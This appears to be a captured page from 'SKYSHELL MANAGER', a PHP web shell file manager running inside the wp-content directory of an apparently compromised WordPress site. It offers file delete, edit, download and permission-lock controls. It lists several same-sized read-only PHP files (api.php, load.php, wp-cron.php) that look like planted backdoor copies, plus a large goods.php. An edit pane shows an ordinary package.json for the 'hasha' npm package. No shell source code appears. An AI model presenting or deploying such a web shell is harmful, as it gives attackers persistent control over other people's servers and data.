📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "hasha", "version": "5.2.2", "description": "Hashing made simple. Get the hash of a buffer/string/stream/file.", "license": "MIT", "repository": "sindresorhus/hasha", "funding": "https://github.com/sponsors/sindresorhus", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "https://sindresorhus.com" }, "engines": { "node": ">=8" }, "scripts": { "test": "xo && ava && tsd" }, "files": [ "index.js", "index.d.ts", "thread.js" ], "keywords": [ "hash", "hashing", "crypto", "hex", "base64", "md5", "sha1", "sha256", "sha512", "sum", "stream", "file", "fs", "buffer", "string", "text", "rev", "revving", "simple", "easy" ], "dependencies": { "is-stream": "^2.0.0", "type-fest": "^0.8.0" }, "devDependencies": { "@types/node": "^12.7.5", "ava": "^2.4.0", "proxyquire": "^2.1.0", "tsd": "^0.8.0", "xo": "^0.24.0" }, "xo": { "rules": { "import/no-unresolved": "off" } } }
Save